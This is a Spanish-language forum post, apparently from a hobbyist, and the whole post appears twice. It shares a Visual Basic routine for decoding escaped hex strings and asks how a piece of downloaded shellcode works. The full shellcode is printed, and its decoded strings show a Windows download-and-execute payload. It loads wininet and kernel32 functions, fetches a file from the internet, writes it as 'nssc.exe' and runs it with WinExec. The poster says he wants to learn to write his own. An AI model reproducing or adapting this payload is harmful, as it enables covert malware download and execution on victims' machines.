Bueno gracias por leer ... aqui viene mi codigo
Private Sub Command1_Click()
On Error Resume Next
Dim sOriginal As String
Dim sBuscar As String
Dim sPoner As String
Dim sbuf As String
Dim fbuf As String
Dim salto As Integer
Dim contador As Integer
sOriginal = Text2.Text
sBuscar = "x"
sPoner = "&H"
salto = 1
sbuf = Replace(sOriginal, sBuscar, sPoner, , , vbTextCompare)
sBuscar = "\"
sPoner = ""
Text1.Text = Replace(sbuf, sBuscar, sPoner, , , vbTextCompare)
sBuscar = """"
sPoner = ""
Text1.Text = Replace(Text1.Text, sBuscar, sPoner, , , vbTextCompare)
Do Until contador = Len(Text1.Text) / 4
fbuf = fbuf & Chr(Mid(Text1.Text, salto, 4))
salto = salto + 4
contador = contador + 1
Loop
Text3.Text = fbuf
End Sub
'text2.text sera igual en el formulario a
'\xEB\x30\x5F\xFC\x8B\xF7\x80""\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1""\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B""\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40""\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D""\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33""\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80""\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6""\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02""\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03""\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03""\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76""\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06""\x43\x8D
'x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02""\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D""\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC""\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1""\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53""\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9""\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0""\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D""\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B""\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1""\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4""\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0""\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x5
'\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4""\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0""\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75""\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64""\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F""\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F""\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F""\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50""\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49""\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65""\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65""\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65""\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
'lo escribo directamente en el formulario por q no encontre la manera de igualar text2.text con estos parametros sin limpiar primero a mano las "
'solo es un ejemplo de shellcode descargado del web al igual q no consegui q mi programa limpie los (enter) y tengo q quitarlas en un editor de textos a mano antes de copiarlas al text2.text
Mis preguntas son varias ....
- Como puedo hacer para limpiar con mi programa las " y los enter &HD en decimal 13 y en general cualquier caracter ascii q no puedo tipear directamente del teclado o q entra en conflicto en el codigo por usarse dentro del codigo para otros menesteres ...
- Entender basicamente q cojones esta escrito en esta shell code .... mi resultado de traduccion despues de limpiar a mano los enter (aunq las comillas si me las limpia si escribo directamente en el formulario) fue este ...
ë0_ü‹÷€?u€7G€?uò‹æ3Ò²Áâ+‹ì3Ò²Áâ+âTZ²|‹âëëW‰uü3À´@Áà‰Eø‹@<Eø@~‹@Eø‹ø‹}ø?KERNtƒÀ‹øëëP‹ø3É3À±‹UøRëW‹×€z€t‹2uøƒÆëë~‹}üQó¦Y_t@ƒÇëÛ_‹}øÁàø‹‹]ü[SÿЉEô‹@<Eô‹pxuôvEô‰EðEô‰EìEô‰Eè‹Uì‹uüv3Û3ɱ‹:}ôVQó¦Y^tCRëíÑã‹uèó3Éf‹ëë}ÁáMð‹ Mô‰Mä‹]ü[-3ɱ}àSQS‹UôR‹EäüÿÐY[ý«d$ø8+tCëùCâá‹EàSüÿÐý«3ɱ[üSQS‹UÄR‹EäÿÐY[ý«8+tCëùCâåü3Ò¶ÁâR3ÒR‹EÔÿЉE°3ÒëëwRRRRS‹EÀÿÐ[‰E¬3ÒR¶€ÁâR3ÒRR{ WP‹E¼ÿЉE¨U R3Ò¶ÁâR‹M°QP‹E¸ÿЋM¨Q‹E´ÿЋM¬Q‹E´ÿÐ3ÒRS‹EÜÿЉE¤‹} W‹U°RP‹EØÿЋU¤R‹EÐÿÐëë3ÒRS‹EÌÿÐ3ÒR‹EÈÿÐèæýÿÿGetModuleHandleAkernel32.dllGetProcAddressLoadLibraryA_lcreat_lwriteGlobalAlloc_lcloseWinExecExitProcesswininet.dllInternetOpenAInternetOpenUrlAInternetReadFileInternetCloseHandleNSnssc.exe
Bueno el final parece estar algo claro al menos ay por donde empezar pero todosa esos demas caracteres q ay desde le principioooo , bueno si quiero programarme una debo entenderlo y esq no consigo encontra ay instrucciones de ensamblador ni nada .......
gracias todos por su tiempo
Private Sub Command1_Click()
On Error Resume Next
Dim sOriginal As String
Dim sBuscar As String
Dim sPoner As String
Dim sbuf As String
Dim fbuf As String
Dim salto As Integer
Dim contador As Integer
sOriginal = Text2.Text
sBuscar = "x"
sPoner = "&H"
salto = 1
sbuf = Replace(sOriginal, sBuscar, sPoner, , , vbTextCompare)
sBuscar = "\"
sPoner = ""
Text1.Text = Replace(sbuf, sBuscar, sPoner, , , vbTextCompare)
sBuscar = """"
sPoner = ""
Text1.Text = Replace(Text1.Text, sBuscar, sPoner, , , vbTextCompare)
Do Until contador = Len(Text1.Text) / 4
fbuf = fbuf & Chr(Mid(Text1.Text, salto, 4))
salto = salto + 4
contador = contador + 1
Loop
Text3.Text = fbuf
End Sub
'text2.text sera igual en el formulario a
'\xEB\x30\x5F\xFC\x8B\xF7\x80""\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1""\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B""\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40""\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D""\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33""\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80""\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6""\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02""\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03""\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03""\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76""\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06""\x43\x8D
'x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02""\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D""\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC""\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1""\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53""\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9""\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0""\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D""\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B""\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1""\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4""\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0""\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x5
'\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4""\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0""\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75""\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64""\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F""\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F""\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F""\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50""\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49""\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65""\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65""\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65""\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
'lo escribo directamente en el formulario por q no encontre la manera de igualar text2.text con estos parametros sin limpiar primero a mano las "
'solo es un ejemplo de shellcode descargado del web al igual q no consegui q mi programa limpie los (enter) y tengo q quitarlas en un editor de textos a mano antes de copiarlas al text2.text
Mis preguntas son varias ....
- Como puedo hacer para limpiar con mi programa las " y los enter &HD en decimal 13 y en general cualquier caracter ascii q no puedo tipear directamente del teclado o q entra en conflicto en el codigo por usarse dentro del codigo para otros menesteres ...
- Entender basicamente q cojones esta escrito en esta shell code .... mi resultado de traduccion despues de limpiar a mano los enter (aunq las comillas si me las limpia si escribo directamente en el formulario) fue este ...
ë0_ü‹÷€?u€7G€?uò‹æ3Ò²Áâ+‹ì3Ò²Áâ+âTZ²|‹âëëW‰uü3À´@Áà‰Eø‹@<Eø@~‹@Eø‹ø‹}ø?KERNtƒÀ‹øëëP‹ø3É3À±‹UøRëW‹×€z€t‹2uøƒÆëë~‹}üQó¦Y_t@ƒÇëÛ_‹}øÁàø‹‹]ü[SÿЉEô‹@<Eô‹pxuôvEô‰EðEô‰EìEô‰Eè‹Uì‹uüv3Û3ɱ‹:}ôVQó¦Y^tCRëíÑã‹uèó3Éf‹ëë}ÁáMð‹ Mô‰Mä‹]ü[-3ɱ}àSQS‹UôR‹EäüÿÐY[ý«d$ø8+tCëùCâá‹EàSüÿÐý«3ɱ[üSQS‹UÄR‹EäÿÐY[ý«8+tCëùCâåü3Ò¶ÁâR3ÒR‹EÔÿЉE°3ÒëëwRRRRS‹EÀÿÐ[‰E¬3ÒR¶€ÁâR3ÒRR{ WP‹E¼ÿЉE¨U R3Ò¶ÁâR‹M°QP‹E¸ÿЋM¨Q‹E´ÿЋM¬Q‹E´ÿÐ3ÒRS‹EÜÿЉE¤‹} W‹U°RP‹EØÿЋU¤R‹EÐÿÐëë3ÒRS‹EÌÿÐ3ÒR‹EÈÿÐèæýÿÿGetModuleHandleAkernel32.dllGetProcAddressLoadLibraryA_lcreat_lwriteGlobalAlloc_lcloseWinExecExitProcesswininet.dllInternetOpenAInternetOpenUrlAInternetReadFileInternetCloseHandleNSnssc.exe
Bueno el final parece estar algo claro al menos ay por donde empezar pero todosa esos demas caracteres q ay desde le principioooo , bueno si quiero programarme una debo entenderlo y esq no consigo encontra ay instrucciones de ensamblador ni nada .......
gracias todos por su tiempo